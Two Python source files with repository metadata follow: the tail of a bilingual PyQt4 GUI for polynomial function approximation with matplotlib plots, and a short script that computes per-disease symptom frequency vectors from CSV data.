        buttonbox.addWidget(self.homebut)
        buttonbox.addWidget(self.savebut)
        layout.addLayout(buttonbox)
        layout.addWidget(self.toolbar)
        layout.addWidget(self.canvas)
        self.setLayout(layout)
        self.ax = self.figure.add_subplot(111)

    def home(self):
        """Reset the view to the original (full) extent."""
        self.toolbar.home()

    def zoom(self):
        """Toggle the toolbar's rectangle-zoom mode."""
        self.toolbar.zoom()

    def pan(self):
        """Toggle the toolbar's pan/drag mode."""
        self.toolbar.pan()

    def save(self):
        """Save the current figure as <UTC timestamp>.png in the CWD."""
        timestr = time.strftime("%Y%m%d_%H%M%S", time.gmtime())
        self.figure.savefig(f'{timestr}.png')
class mainWindow(QtGui.QWidget):
    def __init__(self, parent = None):
        """Build the whole main-window UI: language selector, file/sample
        inputs, vector-dimension spinboxes, polynomial settings, λ-search
        options and the graphics tab area. All default labels are Ukrainian
        (see LangChange for the English variants)."""
        super(mainWindow, self).__init__(parent)
        settings = []
        ##with open("lang_uk.yaml") as f:
        ##settings.append(yaml.load(f))
        # --- Group boxes for the main UI sections ---
        self.polinombox = QtGui.QGroupBox("Задання поліномів")
        self.setWindowTitle("Відновлення функціональної залежності")
        self.lambdabox = QtGui.QGroupBox("Пошук λ")
        self.inputbox = QtGui.QGroupBox("Вхідні та вихідні дані")
        self.graphicbox = QtGui.QGroupBox("Графіки")
        # --- Sample-size spinbox (1..1000, default 45) ---
        self.samplevolume = QtGui.QSpinBox()
        self.samplevolume.setMinimum(1)
        self.samplevolume.setMaximum(1000)
        self.samplevolume.setValue(45)
        self.samplevolume.setAlignment(QtCore.Qt.AlignLeft)
        self.samplevolume.setFixedWidth(100)
        # --- Language selector (index 0 = Ukrainian, 1 = English) ---
        self.langwin = QtGui.QComboBox()
        self.langwin.addItems(["Українська", "English"])
        self.langwin.currentIndexChanged.connect(self.LangChange)
        self.langwin.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        langwinlayout = QtGui.QHBoxLayout()
        self.langlab = QtGui.QLabel("Мова")
        self.langlab.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        self.langlab.setAlignment(QtCore.Qt.AlignLeft)
        langwinlayout.addWidget(self.langlab)
        langwinlayout.addWidget(self.langwin)
        langwinlayout.insertSpacing(1, 40)
        langwinlayout.setAlignment(QtCore.Qt.AlignLeft)
        # --- Input/output file pickers (index 0 = input, 1 = results) ---
        self.filename = []
        self.filebuttons = []
        captions = ["Файл вхідних даних", "Файл результатів"]
        filelayout = []
        self.filelables = []
        filelablelayout = QtGui.QVBoxLayout()
        filefieldslayout = QtGui.QVBoxLayout()
        namedefault = ['input_data.txt', 'out_results.txt']
        for i in range(2):
            self.filename.append(QtGui.QLineEdit(namedefault[i]))
            self.filename[i].setFixedWidth(100)
            self.filename[i].setAlignment(QtCore.Qt.AlignLeft)
            self.filebuttons.append(QtGui.QPushButton("Обрати"))
            self.filebuttons[i].setFixedWidth(60)
            filelayout.append(QtGui.QHBoxLayout())
            filelayout[i].addWidget(self.filename[i])
            self.filelables.append(QtGui.QLabel(captions[i]))
            self.filelables[i].setAlignment(QtCore.Qt.AlignLeft)
            filelablelayout.addWidget(self.filelables[i])
            filelayout[i].addWidget(self.filebuttons[i])
            filefieldslayout.addLayout(filelayout[i])
        # Old-style PyQt4 signal connections to the file dialogs.
        QtCore.QObject.connect(self.filebuttons[0], QtCore.SIGNAL("clicked()"), self.selectInputFile)
        QtCore.QObject.connect(self.filebuttons[1], QtCore.SIGNAL("clicked()"), self.selectOutputFile)
        self.samlable = QtGui.QLabel("Обсяг вибірки")
        self.samlable.setAlignment(QtCore.Qt.AlignLeft)
        filelablelayout.addWidget(self.samlable)
        filefieldslayout.addWidget(self.samplevolume)
        datalayout = QtGui.QHBoxLayout()
        datalayout.addLayout(filelablelayout)
        datalayout.addLayout(filefieldslayout)
        datalayout.insertSpacing(1, 20)
        databox = QtGui.QWidget()
        databox.setLayout(datalayout)
        databox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        # --- Input vector dimensions: x1..x3 (indices 0-2) and y (index 3) ---
        self.vectorbox = QtGui.QGroupBox("Розмірності вхідних векторів")
        vectorlayout = QtGui.QHBoxLayout()
        vectorxlayout = QtGui.QVBoxLayout()
        vectorylayout = QtGui.QVBoxLayout()
        dimensiondefaults = [2, 2, 3, 4]
        self.dimensions = []
        self.dimensionslayout = []
        for i in range(3):
            self.dimensionslayout.append(QtGui.QHBoxLayout())
            self.dimensions.append(QtGui.QSpinBox())
            self.dimensions[i].setMinimum(0)
            self.dimensions[i].setMaximum(100)
            self.dimensions[i].setValue(dimensiondefaults[i])
            dimensionlab = QtGui.QLabel("x" + str(i + 1))
            dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
            self.dimensionslayout[i].addWidget(dimensionlab)
            self.dimensionslayout[i].addWidget(self.dimensions[i])
            vectorxlayout.addLayout(self.dimensionslayout[i])
        # The y vector gets its own spinbox (minimum 1, unlike the x's).
        self.dimensionslayout.append(QtGui.QHBoxLayout())
        self.dimensions.append(QtGui.QSpinBox())
        self.dimensions[3].setMinimum(1)
        self.dimensions[3].setMaximum(100)
        self.dimensions[3].setValue(dimensiondefaults[3])
        dimensionlab = QtGui.QLabel("y")
        dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
        self.dimensionslayout[3].addWidget(dimensionlab)
        self.dimensionslayout[3].addWidget(self.dimensions[3])
        vectorylayout.addLayout(self.dimensionslayout[3])
        for i in range(2):
            # Blank labels as vertical spacers to align the columns.
            vectorylayout.addWidget(QtGui.QLabel(""))
        vectorlayout.addLayout(vectorxlayout)
        vectorlayout.addLayout(vectorylayout)
        self.vectorbox.setLayout(vectorlayout)
        self.vectorbox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        inputlayout = QtGui.QHBoxLayout()
        inputlayout.addWidget(databox)
        inputlayout.addWidget(self.vectorbox)
        self.inputbox.setLayout(inputlayout)
        # --- Polynomial type combo and per-variable degree spinboxes ---
        self.polinomdegreebox = QtGui.QGroupBox("Степені поліномів")
        self.polinomtype = QtGui.QComboBox()
        self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
        self.polinomdegree = []
        self.polinomdegreelayouts = []
        polinomdegreelayout = QtGui.QVBoxLayout()
        for i in range(3):
            self.polinomdegreelayouts.append(QtGui.QHBoxLayout())
            self.polinomdegree.append(QtGui.QSpinBox())
            self.polinomdegree[i].setMinimum(0)
            self.polinomdegree[i].setValue(3+i)#2*(i+1)+2
            polinomdegreelab = QtGui.QLabel("x" + str(i + 1))
            self.polinomdegreelayouts[i].addWidget(polinomdegreelab)
            self.polinomdegreelayouts[i].addWidget(self.polinomdegree[i])
            polinomdegreelayout.addLayout(self.polinomdegreelayouts[i])
        self.polinomdegreebox.setLayout(polinomdegreelayout)
        polinomlayout = QtGui.QVBoxLayout()
        polinomtypelayout = QtGui.QHBoxLayout()
        self.polinomlab = QtGui.QLabel("Поліноми")
        polinomtypelayout.addWidget(self.polinomlab)
        polinomtypelayout.addWidget(self.polinomtype)
        polinomtypelayout.insertSpacing(1, 20)
        polinomlayout.addLayout(polinomtypelayout)
        polinomlayout.addWidget(self.polinomdegreebox)
        self.polinombox.setLayout(polinomlayout)
        # --- λ-search method radio buttons (1-system vs 3-systems) ---
        self.lambdamethod = []
        self.buttonsys1 = QtGui.QRadioButton("за 1єю системою")
        self.lambdamethod.append(self.buttonsys1)
        self.buttonsys3 = QtGui.QRadioButton("за 3ма системами")
        self.lambdamethod.append(self.buttonsys3)
        self.lambdamethod[0].setChecked(True)
        lambdamethodlayout = QtGui.QVBoxLayout()
        for i in self.lambdamethod:
            lambdamethodlayout.addWidget(i)
        self.lambdabox.setLayout(lambdamethodlayout)
        # --- Graphics tab area (tabs are added elsewhere into self.graphics) ---
        self.graphics = []
        self.graphicstab = QtGui.QTabWidget()
        graphiclayout = QtGui.QHBoxLayout()
        graphiclayout.addWidget(self.graphicstab)
        self.graphicbox.setLayout(graphiclayout)
        # "Solve" button; self.start is presumably defined later in the
        # class — TODO confirm (not visible here).
        self.gobutton = QtGui.QPushButton("Розв'язати")
        QtCore.QObject.connect(self.gobutton, QtCore.SIGNAL("clicked()"), self.start)
        # --- Assemble the overall layout ---
        methodlayout = QtGui.QVBoxLayout()
        methodlayout.addWidget(self.polinombox)
        methodlayout.addWidget(self.lambdabox)
        methodlayout.addWidget(self.gobutton)
        for i in range(4):
            # Blank labels as vertical spacers.
            methodlayout.addWidget(QtGui.QLabel(""))
        graphicmethodlayout = QtGui.QHBoxLayout()
        graphicmethodlayout.addLayout(methodlayout)
        graphicmethodlayout.addWidget(self.graphicbox)
        mainlayout = QtGui.QVBoxLayout()
        mainlayout.addLayout(langwinlayout)
        mainlayout.addWidget(self.inputbox)
        mainlayout.addLayout(graphicmethodlayout)
        self.setLayout(mainlayout)
def selectInputFile(self):
    """Open a file dialog and remember the chosen input-data file path."""
    chosen = str(QtGui.QFileDialog.getOpenFileName(
        None,
        "Виберіть файл з вхідними даними",
        QtCore.QDir.currentPath(),
        "All (*);;Images (*.png *.jpg)"))
    # An empty string means the user cancelled — keep the previous value.
    if chosen:
        self.filename[0].setText(chosen)
def selectOutputFile(self):
    """Open a file dialog and remember the chosen results-file path.

    Uses a *save* dialog so the user may type a file that does not exist
    yet (the original open-file dialog only allowed existing files).
    """
    path = str(QtGui.QFileDialog.getSaveFileName(
        None,
        "Виберіть файл для вихідних даних",
        QtCore.QDir.currentPath(),
        "All (*);;Images (*.png *.jpg)"))
    # BUG FIX: the original test was `if not path == []`, which compares a
    # str to a list and is therefore always True — cancelling the dialog
    # blanked the output-file field. Test the string itself instead.
    if path:
        self.filename[1].setText(path)
def LangChange(self):
    """Relabel every user-visible widget for the selected UI language.

    Triggered by the language combo box (`self.langwin`):
    index 0 = Ukrainian, index 1 = English. Rewrites group-box titles,
    labels, buttons, per-plot toolbar buttons, and rebuilds the
    polynomial-type combo items in the chosen language.

    NOTE(review): the English captions contain typos ("resoration",
    "dimentions", "Polinom") — these are runtime strings and are left
    untouched here.
    """
    ##print("LangChanged")
    now = self.langwin.currentIndex()  # 0 = Ukrainian, 1 = English
    if now == 1:
        # --- English captions ---
        self.setWindowTitle("Functional dependency resoration")
        self.vectorbox.setTitle("Input vectors dimentions")
        self.polinombox.setTitle("Polinoms setting")
        self.inputbox.setTitle("Input and output data")
        self.lambdabox.setTitle("λ Search")
        self.graphicbox.setTitle("Graphics")
        self.polinomdegreebox.setTitle("Polinom degrees")
        self.langlab.setText("Language")
        self.filelables[0].setText("Input data file")
        self.filelables[1].setText("Results file")
        for i in range(2):
            self.filebuttons[i].setText("Select")
        self.samlable.setText("Sample size")
        self.polinomlab.setText("Polinoms of")
        self.buttonsys1.setText("with 1 system")
        self.buttonsys3.setText("with 3 systems")
        self.gobutton.setText("Solve")
        # Plot toolbars exist only after a solve; empty list is harmless.
        for graphic in self.graphics:
            graphic.zoombut.setText("Zoom")
            graphic.panbut.setText("Pan")
            graphic.homebut.setText("Home")
            graphic.savebut.setText("Save")
        # Rebuild combo items; indices stay aligned with the Ukrainian set.
        self.polinomtype.clear()
        self.polinomtype.addItems(["Chebyshev", "Legendre", "Lagger", "Hermit"])
    if now == 0:
        # --- Ukrainian captions ---
        self.setWindowTitle("Відновлення функціональної залежності")
        self.vectorbox.setTitle("Розмірності вхідних векторів")
        self.polinombox.setTitle("Поліноми")
        self.inputbox.setTitle("Вхідні та вихідні дані")
        self.lambdabox.setTitle("Пошук λ")
        self.graphicbox.setTitle("Графіки")
        self.polinomdegreebox.setTitle("Степені поліномів")
        self.langlab.setText("Мова")
        self.filelables[0].setText("Файл вхідних даних")
        self.filelables[1].setText("Файл результатів")
        for i in range(2):
            self.filebuttons[i].setText("Обрати")
        self.samlable.setText("Обсяг вибірки")
        self.polinomlab.setText("Задання поліномів")
        self.buttonsys1.setText("за 1єю системою")
        self.buttonsys3.setText("за 3ма системами")
        self.gobutton.setText("Розв'язати")
        for graphic in self.graphics:
            graphic.zoombut.setText("Збільшити")
            graphic.panbut.setText("Перемістити")
            graphic.homebut.setText("Повністю")
            graphic.savebut.setText("Зберегти")
        self.polinomtype.clear()
        self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
def start(self):
    """Run the approximation and redraw the per-component result plots.

    Reads the UI settings (sample size, input dimensions, polynomial
    type/degrees, λ-search mode), drives the ``Iterator`` model, then
    fills one tab per output component with measured vs. reconstructed
    curves plus one tab per component with normalized absolute residuals.
    """
    # Tear down plots from the previous run.  BUG FIX: the original never
    # reset self.graphics, so after the first run new PlotManagers were
    # appended behind stale, destroyed widgets and self.graphics[i] below
    # indexed the dead ones.
    for widget in self.graphics:
        widget.hide()
        widget.destroy()
    self.graphics = []
    self.graphicstab.clear()

    dimensions = [self.dimensions[i].value() for i in range(3)]
    degrees = [self.polinomdegree[i].value() for i in range(3)]
    # 0 → single-system λ search, 1 → three separate systems.
    lambda_flag = 0 if self.lambdamethod[0].isChecked() else 1

    mod = Iterator(self.samplevolume.value(), dimensions,
                   self.dimensions[3].value(), self.filename[0].text(),
                   self.polinomtype.currentIndex(), degrees, lambda_flag)
    mod.normalization()

    n_array = np.arange(float(self.samplevolume.value()))
    ydim = self.dimensions[3].value()

    # One tab per output component for the fit ('Y0', 'Y1', ...),
    # then one per component for the residuals ('res0', 'res1', ...).
    for i in range(ydim):
        self.graphics.append(PlotManager(self))
        self.graphicstab.addTab(self.graphics[i], 'Y' + str(i))
    for i in range(ydim):
        self.graphics.append(PlotManager(self))
        self.graphicstab.addTab(self.graphics[ydim + i], 'res' + str(i))

    mod.approximate(self.filename[1].text())
    mod.denormalization()

    # Measured (blue) vs. reconstructed (orange) curves.
    for i in range(ydim):
        ax = self.graphics[i].ax
        ax.clear()
        ax.set_facecolor('#dddddd')
        ax.plot(n_array, mod.y[i], 'b', n_array, mod.y_cnt[i], '#D53206')
        self.graphics[i].canvas.draw()

    # |residual| normalized by the largest measured value of the component.
    # (np.fabs replaces the original element-by-element loop.)
    for i in range(ydim):
        resid = np.fabs((mod.y[i] - mod.y_cnt[i]) / max(mod.y[i]))
        ax = self.graphics[ydim + i].ax
        ax.clear()
        ax.set_facecolor('#dddddd')
        ax.plot(n_array, resid, '#0D6806')
        self.graphics[ydim + i].canvas.draw()
# Application bootstrap: create the Qt application, show the main window,
# and hand control to the Qt event loop until the window is closed.
app = QtGui.QApplication(sys.argv)
window = mainWindow()
window.show()
# exec_() blocks until quit; its return code becomes the process exit status.
sys.exit(app.exec_())
|
[
"noreply@github.com"
] |
ozhenchuk.noreply@github.com
|
4c5c34eeb833bb131f5c7d69cd376b51d860a327
|
5c760034921788b8d9e92a9c78f210127e4a6f56
|
/computeDiseaseVec.py
|
1e20bc183c04d65bdf8f75c316df7b041cd6a76d
|
[] |
no_license
|
DiliSimon/HopHacks19
|
80c6d1a99aa3586a94f5087aa46c0f2beb72ee5d
|
afd1579e3f4fde8a3abd468f97af67b99588e8bb
|
refs/heads/master
| 2021-02-10T23:36:00.186011
| 2020-03-02T17:22:01
| 2020-03-02T17:22:01
| 244,429,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
from defaultlist import defaultlist

# Build the ordered list of known disease names, one per line of 'disease_list'.
dlist = []
with open('disease_list') as f:
    for l in f:
        dlist.append(l.strip('\n'))

# Precomputed name -> index map replaces O(n) dlist.index() per data row.
dindex = {name: i for i, name in enumerate(dlist)}

# First pass over 'disease_vector.csv': count how many rows each disease has.
# Row format (assumed from the parsing below — TODO confirm):
#   "<disease name> [s0, s1, ..., sk]\n"
dNum = defaultlist(int)
with open('disease_vector.csv') as f:
    for l in f:
        dname = l.split('[')[0][:-1]  # drop the space before '['
        dNum[dindex[dname]] += 1

# Second pass: for each disease, fraction of its rows with a nonzero score
# at each position (adding 1/dNum per nonzero occurrence).
dveclist = defaultlist(list)
with open('disease_vector.csv') as f:
    for l in f:
        dname = l.split('[')[0][:-1]
        indexOfDisease = dindex[dname]
        # BUG FIX: the original re-created the per-disease vector on EVERY
        # row, wiping the counts accumulated from that disease's earlier
        # rows; initialize it only once.
        if dveclist[indexOfDisease] == []:
            dveclist[indexOfDisease] = defaultlist(int)
        scorelist = l.split('[')[1].split(',')
        for ind in range(len(scorelist)):
            if ind == len(scorelist) - 1:
                # Strip the closing "]" (and newline, if present).  The
                # original sliced [:-2], which chops a digit when the last
                # line has no trailing newline.
                scorelist[ind] = scorelist[ind].rstrip(']\n')
            if not int(scorelist[ind]) == 0:
                dveclist[indexOfDisease][ind] += 1 / dNum[indexOfDisease]

print(dveclist)
# Report indices of diseases that never appeared in the vector file.
for ind in range(len(dveclist)):
    if dveclist[ind] == []:
        print(ind)
|
[
"Gtingwen@outlook.com"
] |
Gtingwen@outlook.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.